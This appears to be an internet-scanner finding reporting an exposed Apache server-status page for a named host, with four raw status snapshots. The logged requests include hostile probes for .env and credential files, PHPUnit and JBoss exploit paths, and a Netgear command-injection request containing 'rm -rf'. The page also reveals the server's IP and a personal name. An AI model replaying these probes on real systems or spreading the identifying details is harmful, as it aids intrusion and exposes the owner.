Apache 2.4.52
tcp/443
The server-status page (usually /server-status
) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb811b9214
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Thursday, 31-Oct-2024 23:10:59 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 345 Parent Server MPM Generation: 344 Server uptime: 342 days 16 hours 11 minutes 20 seconds Server load: 0.00 0.00 0.00 Total accesses: 581989 - Total Traffic: 62.2 GB - Total Duration: 80531975 CPU Usage: u981.47 s1926.38 cu6165.09 cs1732.79 - .0365% CPU load .0197 requests/sec - 2257 B/second - 112.1 kB/request - 138.374 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02716205no0yes025000 12716206no0yes124000 Sum200 149000 __________________________W_______________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-34427162050/4/6044_ 0.78129067850.00.02110.90 164.92.244.132http/1.1 0-34427162050/7/5983_ 0.82543508424920.00.0288.03 162.19.237.132http/1.1localhost:80GET /.env HTTP/1.1 0-34427162050/6/6106_ 0.761035028795620.00.0398.83 178.211.139.105http/1.1localhost:80GET /command_port.ini HTTP/1.1 0-34427162050/5/5994_ 0.79138689460.00.01102.94 193.174.89.19http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-34427162050/5/6088_ 0.761034908880040.00.02109.45 161.35.18.89http/1.1localhost:80POST /sdk HTTP/1.1 0-34427162050/3/6095_ 0.7771909048150.00.00128.23 157.230.16.152http/1.1localhost:80\x16\x03\x01\x01$\x01 0-34427162050/7/6092_ 0.74218702960.00.0277.90 164.92.244.132h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34427162050/7/6021_ 0.77543538648680.00.04100.31 162.19.237.132http/1.1 0-34427162050/6/5981_ 0.68918058829160.00.0592.14 95.214.55.43http/1.1localhost:80GET / HTTP/1.1 0-34427162050/5/6079_ 0.8811649244940.00.04174.98 164.92.244.132http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 0-34427162050/4/6044_ 0.9001368681660.00.0281.35 164.92.244.132http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-34427162050/5/6002_ 0.77238684010.00.0373.10 178.62.245.165http/1.1localhost:80GET / HTTP/1.1 0-34427162050/5/6085_ 0.8521199162730.00.0496.60 164.92.244.132http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-34427162050/8/6053_ 0.8711688905130.00.0686.59 164.92.244.132http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-34427162050/5/6081_ 0.81918508854210.00.0259.26 179.43.191.98http/1.1localhost:80GET / HTTP/1.1 0-34427162050/4/6128_ 0.52918009293930.00.0197.87 48.217.211.228http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-34427162050/6/6058_ 0.77543508985880.00.06134.29 162.19.237.132http/1.1 0-34427162050/5/5983_ 0.79103491788773440.00.03118.35 193.174.89.19http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-34427162050/4/6010_ 0.809187348508380.00.0194.41 45.9.168.219http/1.1localhost:80POST / HTTP/1.1 0-34427162050/7/5946_ 0.76918708952110.00.0490.38 45.9.168.219http/1.1 0-34427162050/7/5973_ 0.83139808464940.00.0666.57 198.235.24.84http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 0-34427162050/5/5973_ 0.7213971338922290.00.0672.34 198.235.24.84http/1.1 0-34427162050/6/5892_ 0.8372458443830.00.0279.96 141.98.11.79http/1.1localhost:80GET / HTTP/1.1 0-34427162050/7/5991_ 0.737192078893070.00.0393.62 165.227.46.30http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-34427162050/3/5979_ 0.82543518935280.00.01130.88 162.19.237.132http/1.1localhost:80POST / HTTP/1.1 1-34427162060/11/8716_ 3.141201769990860.00.101828.66 13.91.182.132http/1.1 1-34427162061/11/8575W 3.120010205130.00.121181.63 164.92.244.132http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-34427162060/11/7536_ 3.319322689541780.00.081544.25 167.99.193.65http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-34427162060/9/8285_ 3.3256309885750.00.011705.65 92.255.57.58http/1.1localhost:80GET /actuator/gateway/routes HTTP/1.1 1-34427162060/7/7599_ 3.41017210001390.00.061292.81 164.92.244.132http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-34427162060/8/9584_ 3.0212025610084070.00.081501.81 13.91.182.132http/1.1 1-34427162060/13/7868_ 3.08039796680.00.131652.19 13.91.182.132h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-34427162060/8/10082_ 2.99563010020760.00.031825.50 45.9.168.219http/1.1 1-34427162060/12/8060_ 3.16229710300.00.051352.98 164.92.244.132h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-34427162060/14/8516_ 3.42013210143250.00.131692.26 164.92.244.132http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-34427162060/11/8545_ 3.00209540940.02.961963.33 164.92.244.132h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-34427162060/9/8050_ 3.11026010106370.00.054065.34 13.91.182.132http/1.1 1-34427162060/11/7707_ 3.3193229210056650.00.112092.17 167.99.193.65http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-34427162060/10/9444_ 3.4301289751650.00.081624.04 164.92.244.132http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-34427162060/6/7423_ 3.1493229919480.00.081163.95 185.191.126.248http/1.1localhost:80GET / HTTP/1.1 1-34427162060/8/8240_ 3.07229840180.00.041369.28 164.92.244.132http/1.1 1-34427162060/12/8324_ 2.99932210170320.00.071843.36 147.185.132.25http/1.1 1-34427162060/7/7359_ 3.00209648240.00.042009.36 164.92.244.132http/1.1 1-34427162060/11/7783_ 3.17139547090.00.072349.66 164.92.244.132h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-34427162060/14/7447_ 3.40012812704940.00.131967.31 164.92.244.132http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-34427162060/8/8381_ 3.16219771840.00.021902.66 164.92.244.132h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-34427162060/9/7456_ 3.16219962920.00.053158.48 164.92.244.132http/1.1 1-34427162060/9/7684_ 3.07109932980.00.053645.85 164.92.244.132http/1.1 1-34427162060/14/7665_ 3.021202010176350.00.131236.91 13.91.182.132h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-34427162060/6/7432_ 3.1412021979632020.00.061608.27 13.91.182.132h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 2-330-0/0/2604. 0.0012066571963429060.00.0051.60 143.244.139.14http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb293347f3
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Wednesday, 30-Oct-2024 00:47:47 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 344 Parent Server MPM Generation: 343 Server uptime: 340 days 17 hours 48 minutes 8 seconds Server load: 0.00 0.00 0.00 Total accesses: 581031 - Total Traffic: 62.2 GB - Total Duration: 80483693 CPU Usage: u972.64 s1913.26 cu6161.19 cs1731.44 - .0366% CPU load .0197 requests/sec - 2269 B/second - 112.3 kB/request - 138.519 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02712100no0yes025000 12712101no0yes124000 Sum200 149000 ___________________________________________W______.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-34327121000/2/6022_ 0.090639056630.00.02110.72 64.227.32.66http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-34327121000/1/5961_ 0.0311378416010.00.0287.84 64.227.32.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-34327121000/0/6079_ 0.00108767980.00.0098.48 176.177.18.164h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/2.0 0-34327121000/0/5971_ 0.0001728676640.00.00102.72 64.227.32.66http/1.1 0-34327121000/2/6066_ 0.080708870890.00.02109.30 64.227.32.66http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 0-34327121000/1/6080_ 0.090619036330.00.02128.10 64.227.32.66http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-34327121000/0/6066_ 0.0077308692930.00.0077.70 184.105.247.194http/1.1 0-34327121000/0/5999_ 0.00008638510.00.00100.09 64.227.32.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/0/5960_ 0.0001898821580.00.0092.00 64.227.32.66http/1.1 0-34327121000/1/6056_ 0.070699233580.00.02174.72 64.227.32.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-34327121000/0/6026_ 0.00108673770.00.0081.20 64.227.32.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/0/5978_ 0.0011678673670.00.0072.88 64.227.32.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/0/6061_ 0.0011419149110.00.0096.37 64.227.32.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/0/6029_ 0.0011108892240.00.0086.39 223.244.235.136http/1.1 0-34327121000/0/6056_ 0.0011138841980.00.0059.02 162.19.239.42http/1.1 0-34327121000/0/6103_ 0.001191809279540.00.0097.64 223.244.235.136http/1.1 0-34327121000/0/6034_ 0.00018968280.00.00134.03 64.227.32.66http/1.1 0-34327121000/1/5961_ 0.0112308767330.00.00118.12 223.244.235.136http/1.1localhost:80HEAD /invoker/EJBInvokerServlet HTTP/1.1 0-34327121000/0/5995_ 0.00128500730.00.0094.24 64.227.32.66http/1.1 0-34327121000/0/5923_ 0.00038938770.00.0090.13 154.212.141.203http/1.1 0-34327121000/0/5948_ 0.00018446010.00.0066.31 64.227.32.66http/1.1 0-34327121000/1/5949_ 0.0111708909190.00.0072.11 223.244.235.136http/1.1localhost:80HEAD /invoker/JMXInvokerServlet HTTP/1.1 0-34327121000/0/5866_ 0.00008432550.00.0079.77 64.227.32.66h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34327121000/1/5966_ 0.0111308877340.00.0093.39 223.244.235.136http/1.1localhost:80HEAD /web-console/ServerInfo.jsp HTTP/1.1 0-34327121000/0/5960_ 0.0011218925180.00.00130.70 78.153.140.224http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-34327121010/0/8697_ 0.0025671199986700.00.001828.52 162.19.239.42http/1.1 1-34327121010/0/8560_ 0.00256720510194900.00.001181.47 172.169.190.140http/1.1 1-34327121010/1/7520_ 0.01257219529430.00.011544.11 179.43.191.98http/1.1localhost:80GET / HTTP/1.1 1-34327121010/0/8270_ 0.001926699884220.00.001705.58 185.191.126.248http/1.1 1-34327121010/0/7587_ 0.00192629995040.00.001292.69 61.228.183.188http/1.1localhost:80GET / HTTP/1.0 1-34327121010/1/9569_ 0.02987510078990.00.001501.69 184.105.247.194http/1.1localhost:80GET / HTTP/1.1 1-34327121010/0/7852_ 0.00286519786930.00.001652.01 162.19.239.42http/1.1localhost:80POST / HTTP/1.1 1-34327121010/0/10064_ 0.00286518510011760.00.001825.36 185.191.126.248http/1.1 1-34327121010/0/8044_ 0.00286509705460.00.001352.86 185.191.126.248http/1.1localhost:80POST /HNAP1/ HTTP/1.1 1-34327121010/0/8495_ 0.00286520510130150.00.001692.06 84.17.60.59http/1.1 1-34327121010/0/8524_ 0.00286519533060.00.001960.30 122.117.7.53http/1.1localhost:80GET / HTTP/1.0 1-34327121010/0/8035_ 0.002865010098310.00.004065.22 154.212.141.203h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-34327121010/0/7691_ 0.00987110041870.00.002091.99 184.105.247.194http/1.1 1-34327121010/0/9429_ 0.001162079745040.00.001623.93 167.94.138.161h2clocalhost:80[0/0] init 1-34327121010/1/7414_ 0.040659911930.00.021163.84 64.227.32.66http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-34327121010/0/8225_ 0.0001139837870.00.001369.21 78.153.140.224http/1.1ravignon.mycloud.paris:443GET /Staging/.env HTTP/1.1 1-34327121010/0/8310_ 0.000310169380.00.001843.28 154.212.141.203http/1.1 1-34327121010/1/7346_ 0.01193129642380.00.012009.23 185.191.126.248http/1.1localhost:80GET / HTTP/1.1 1-34327121011/0/7763W 0.00009538660.00.002349.50 64.227.32.66http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-34327121010/0/7429_ 0.00286518012696080.00.001967.14 162.19.239.42http/1.1 1-34327121010/0/8365_ 0.0011509766880.00.001902.56 162.19.239.42http/1.1localhost:80GET /.env HTTP/1.1 1-34327121010/1/7442_ 0.040589960290.00.023158.39 64.227.32.66http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-34327121010/1/7670_ 0.0501319929290.00.023645.75 64.227.32.66http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-34327121010/1/7644_ 0.02121010161210.00.001236.72 223.244.235.136http/1.1localhost:80HEAD /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.sy 1-34327121010/0/7424_ 0.0028651899629130.00.001608.11 167.94.138.161h2clocalhost:80[0/0] done 2-330-0/0/2604. 0.0010396661963429060.00.0051.60 143.244.139.14http/1.1 2-330-0/0/2568. 0.0010396660
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb79e6d8dd
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Monday, 28-Oct-2024 00:03:11 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 342 Parent Server MPM Generation: 341 Server uptime: 338 days 17 hours 3 minutes 32 seconds Server load: 0.01 0.00 0.00 Total accesses: 579754 - Total Traffic: 62.2 GB - Total Duration: 80455129 CPU Usage: u966.42 s1900.61 cu6152.43 cs1728.09 - .0367% CPU load .0198 requests/sec - 2283 B/second - 112.5 kB/request - 138.775 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02703579no0yes124000 12703580no0yes025000 Sum200 149000 ________________________W_________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-34127035790/0/6005_ 0.0018909053210.00.00110.66 173.239.211.105http/1.1 0-34127035790/0/5945_ 0.0012208413890.00.0087.78 173.239.211.105http/1.1localhost:80GET /time.php HTTP/1.1 0-34127035790/1/6067_ 0.0811418759650.00.0295.53 167.172.232.142http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-34127035790/0/5954_ 0.0012548668870.00.00102.62 138.199.21.238http/1.1 0-34127035790/1/6055_ 0.0012508869530.00.00109.26 138.199.21.238http/1.1localhost:80GET /.env HTTP/1.1 0-34127035790/0/6067_ 0.0012009032120.00.00128.00 216.73.161.1http/1.1 0-34127035790/1/6057_ 0.082808692830.00.0277.69 167.172.232.142http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-34127035790/0/5982_ 0.00208636850.00.00100.02 216.73.161.6http/1.1localhost:80GET /laravel/info.php HTTP/1.1 0-34127035790/0/5945_ 0.00018816660.00.0091.90 178.215.238.69http/1.1localhost:80GET /login.rsp HTTP/1.1 0-34127035790/1/6039_ 0.080819225120.00.02174.61 167.172.232.142http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-34127035790/0/6011_ 0.0012418670790.00.0081.15 138.199.21.238http/1.1 0-34127035790/1/5967_ 0.0312008671940.00.0072.85 138.199.21.238http/1.1localhost:80GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1. 0-34127035790/0/6043_ 0.0011909144550.00.0096.28 138.199.21.238http/1.1 0-34127035790/0/6011_ 0.00408891030.00.0086.34 167.172.232.142h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34127035790/1/6044_ 0.0012438839710.00.0058.98 138.199.21.238http/1.1localhost:80POST / HTTP/1.1 0-34127035790/0/6089_ 0.00209277600.00.0097.58 167.172.232.142http/1.1 0-34127035790/0/6023_ 0.00308968140.00.00134.01 167.172.232.142h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34127035790/0/5946_ 0.00308764990.00.00118.06 167.172.232.142http/1.1 0-34127035790/1/5975_ 0.031231268492390.00.0294.13 138.199.21.238http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-34127035790/0/5914_ 0.00308934760.00.0090.07 167.172.232.142http/1.1 0-34127035790/0/5941_ 0.00318445940.00.0066.30 167.172.232.142h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-34127035790/1/5933_ 0.031212258903800.00.0272.02 138.199.21.238http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-34127035790/1/5855_ 0.090798432520.00.0279.75 167.172.232.142http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 0-34127035790/0/5950_ 0.0001158875080.00.0093.33 209.38.20.50http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-34127035791/0/5951W 0.00008922110.00.00130.67 167.172.232.142http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-34127035800/1/8655_ 0.014889981570.00.021828.37 167.172.232.142http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-34127035800/0/8531_ 0.004410183500.00.001181.34 95.214.55.43http/1.1localhost:80GET / HTTP/1.1 1-34127035800/0/7487_ 0.00309524090.00.001543.97 167.172.232.142h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-34127035800/0/8227_ 0.00329872770.00.001705.40 167.172.232.142http/1.1 1-34127035800/0/7545_ 0.00209984460.00.001292.51 167.172.232.142h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-34127035800/0/9538_ 0.002110072360.00.001501.56 167.172.232.142http/1.1 1-34127035800/1/7810_ 0.031699783090.00.021651.90 167.172.232.142http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-34127035800/1/10032_ 0.0416310003760.00.021825.20 167.172.232.142http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-34127035800/1/8015_ 0.040619697770.00.021352.74 167.172.232.142http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-34127035800/0/8459_ 0.00189210120370.00.001691.88 162.19.236.43http/1.1localhost:80POST / HTTP/1.1 1-34127035800/0/8485_ 0.0018919523320.00.001960.09 209.38.20.50http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-34127035800/0/8006_ 0.00189110093880.00.004065.12 173.239.211.112http/1.1 1-34127035800/0/7657_ 0.00189310038550.00.002091.87 95.214.53.91http/1.1localhost:80GET / HTTP/1.1 1-34127035800/0/9392_ 0.0018909736080.00.001623.80 173.239.211.103http/1.1localhost:80GET /develop/phpinfo.php HTTP/1.1 1-34127035800/0/7369_ 0.0018929902880.00.001163.67 36.234.90.105http/1.1localhost:80GET / HTTP/1.0 1-34127035800/0/8178_ 0.0018919822740.00.001369.02 162.19.236.43http/1.1 1-34127035800/0/8280_ 0.00189010164210.00.001843.18 162.19.236.43http/1.1 1-34127035800/0/7301_ 0.0018909633710.00.002009.05 63.135.161.207http/1.1 1-34127035800/0/7716_ 0.0018929527180.00.002349.30 162.19.236.43http/1.1 1-34127035800/0/7391_ 0.00189012686110.00.001966.96 63.135.161.212http/1.1localhost:80GET /backup/info.php HTTP/1.1 1-34127035800/0/8337_ 0.0018909761580.00.001902.44 216.73.161.1http/1.1localhost:80GET /api/info.php HTTP/1.1 1-34127035800/0/7403_ 0.0018909953880.00.003158.24 63.135.161.190http/1.1localhost:80GET /_environment HTTP/1.1 1-34127035800/0/7635_ 0.0018929916280.00.003645.51 125.228.181.148http/1.1localhost:80GET / HTTP/1.0 1-34127035800/0/7604_ 0.00189010153050.00.001236.54 63.135.161.212http/1.1 1-34127035800/0/7385_ 0.0018909624870.00.001607.99 162.19.236.43http/1.1localhost:80GET /.env HTTP/1.1 2-330-0/0/2604. 0.008641891963429060.00.0051.60 143.244.139.14http/1.1 2-330-0/0/2568. 0.00864189
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb229c0a86
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 25-Oct-2024 21:02:35 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 339 Parent Server MPM Generation: 338 Server uptime: 336 days 14 hours 2 minutes 56 seconds Server load: 0.01 0.01 0.00 Total accesses: 578257 - Total Traffic: 62.2 GB - Total Duration: 80404478 CPU Usage: u967.95 s1891.79 cu6136.49 cs1720.95 - .0369% CPU load .0199 requests/sec - 2297 B/second - 112.8 kB/request - 139.046 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02690794no0yes124000 12690795no0yes025000 Sum200 149000 ________W_________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33826907940/9/5990_ 2.2916893739047900.00.04110.59 80.82.77.202http/1.1localhost:80\x16\x03\x02\x01o\x01 0-33826907940/5/5928_ 2.3501438408250.00.0587.69 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-33826907940/11/6045_ 2.2461538754420.00.0495.46 194.233.95.39http/1.1ravignon.mycloud.paris:443GET /app_dev.php/_profiler/phpinfo HTTP/1.1 0-33826907940/8/5941_ 2.126331558668770.00.03102.60 179.43.168.146http/1.1ravignon.mycloud.paris:443GET /.json HTTP/1.1 0-33826907940/15/6036_ 2.31909008864320.00.02109.18 202.112.238.240http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-33826907940/9/6052_ 2.3364419031520.00.06127.96 93.174.93.12http/1.1localhost:80GET / HTTP/1.0 0-33826907940/9/6034_ 2.3401388679780.00.0577.57 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-33826907940/9/5969_ 1.72138636790.00.0399.99 142.93.129.190http/1.1 0-33826907941/6/5924W 2.14008809130.00.0191.80 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 0-33826907940/13/6010_ 2.2717611689217020.00.03174.46 194.233.95.39http/1.1ravignon.mycloud.paris:443GET /config/index.js HTTP/1.1 0-33826907940/12/5993_ 2.28175581808664290.00.0581.06 194.233.95.39http/1.1ravignon.mycloud.paris:443GET /config/application.yml HTTP/1.1 0-33826907940/5/5948_ 1.511755318666200.00.0272.72 206.189.57.162h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-33826907940/6/6024_ 1.90176102169137940.00.0196.21 206.189.57.162http/1.1 0-33826907940/8/5994_ 2.13038889390.00.0286.31 36.73.145.13http/1.1localhost:80GET / HTTP/1.1 0-33826907940/8/6027_ 2.10487458837100.00.0158.90 80.75.212.9http/1.1 0-33826907940/6/6073_ 2.31912839274360.00.0297.52 162.19.239.42http/1.1localhost:80POST / HTTP/1.1 0-33826907940/12/6006_ 2.20123001928965630.00.03133.97 199.45.155.94http/1.1ravignon.mycloud.paris:443GET /favicon.ico HTTP/1.1 0-33826907940/7/5930_ 1.271230018763620.00.01118.00 199.45.155.94http/1.1 0-33826907940/12/5955_ 2.171689318489020.00.0194.04 162.19.239.42http/1.1localhost:80GET /.env HTTP/1.1 0-33826907940/7/5891_ 2.301230508933580.00.0190.01 172.169.190.122http/1.1localhost:80GET /manager/text/list HTTP/1.1 0-33826907940/5/5924_ 2.30964008441720.00.0066.24 147.185.132.222http/1.1localhost:80\x16\x03\x01 0-33826907940/7/5917_ 1.28963948900110.00.0171.96 199.45.155.94h2ravignon.mycloud.paris:443[0/0] init 0-33826907940/2/5833_ 1.46912828430210.00.0079.68 162.19.239.42http/1.1 0-33826907940/9/5931_ 2.21909008866150.00.0493.25 80.75.212.9http/1.1localhost:80CONNECT worldsfastest.com:443 HTTP/1.1 0-33826907940/3/5934_ 2.08166908913320.00.01130.56 13.64.107.205http/1.1 1-33826907950/35/8612_ 8.3122749974960.00.111828.20 162.19.239.42http/1.1localhost:80POST / HTTP/1.1 1-33826907950/44/8500_ 8.31104715210177970.00.121181.22 206.237.122.48http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-33826907950/24/7450_ 8.3181019515360.00.061543.78 162.19.239.42http/1.1localhost:80GET /.env HTTP/1.1 1-33826907950/32/8177_ 8.5201339864860.00.121705.20 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-33826907950/44/7491_ 8.5301409967470.00.171292.35 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-33826907950/23/9492_ 8.31118616310057250.00.131501.30 206.237.122.48http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-33826907950/48/7764_ 8.3681509766310.00.161651.72 185.16.38.232http/1.1localhost:80GET /cgi-bin/luci/;stok=/locale HTTP/1.1 1-33826907950/43/9975_ 8.3610472469991060.00.191824.96 172.168.40.176http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-33826907950/22/7973_ 8.35029685060.00.201352.54 46.174.191.29http/1.1localhost:80GET / HTTP/1.0 1-33826907950/34/8425_ 8.54016510113460.00.071691.73 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-33826907950/28/8445_ 8.3723029505290.00.121959.87 198.235.24.72http/1.1localhost:80GET / HTTP/1.0 1-33826907950/31/7973_ 8.51115910081510.00.134064.98 142.93.129.190http/1.1ravignon.mycloud.paris:443GET /server HTTP/1.1 1-33826907950/38/7621_ 8.331110028330.00.102091.72 183.240.139.31http/1.1localhost:80GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tm 1-33826907950/39/9358_ 8.4013069728490.00.151623.61 142.93.129.190http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33826907950/22/7339_ 8.33119893670.00.131163.46 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33826907950/41/8143_ 8.5011649813500.00.141368.89 142.93.129.190http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-33826907950/26/8230_ 7.7719510043060.00.061842.98 142.93.129.190http/1.1 1-33826907950/33/7256_ 7.771719625560.00.062008.96 162.19.239.42http/1.1 1-33826907950/38/7666_ 8.33119512600.00.112349.09 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33826907950/36/7341_ 8.25126812672010.00.151966.78 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33826907950/33/8297_ 8.22109745340.00.111902.24 142.93.129.190http/1.1 1-33826907950/35/7363_ 8.001659939600.00.203158.01 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-33826907950/34/7603_ 8.33129904570.00.123645.38 142.93.129.190http/1.1 1-33826907950/55/7561_ 8.131310139450.00.111236.35 142.93.129.190http/1.1 1-33826907950/22/7346_ 8.22139622310.00.071607.85 142.93.129.190h2ravignon.mycloud.paris:443[0/0] Software caused connection
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb5ef4cc3c
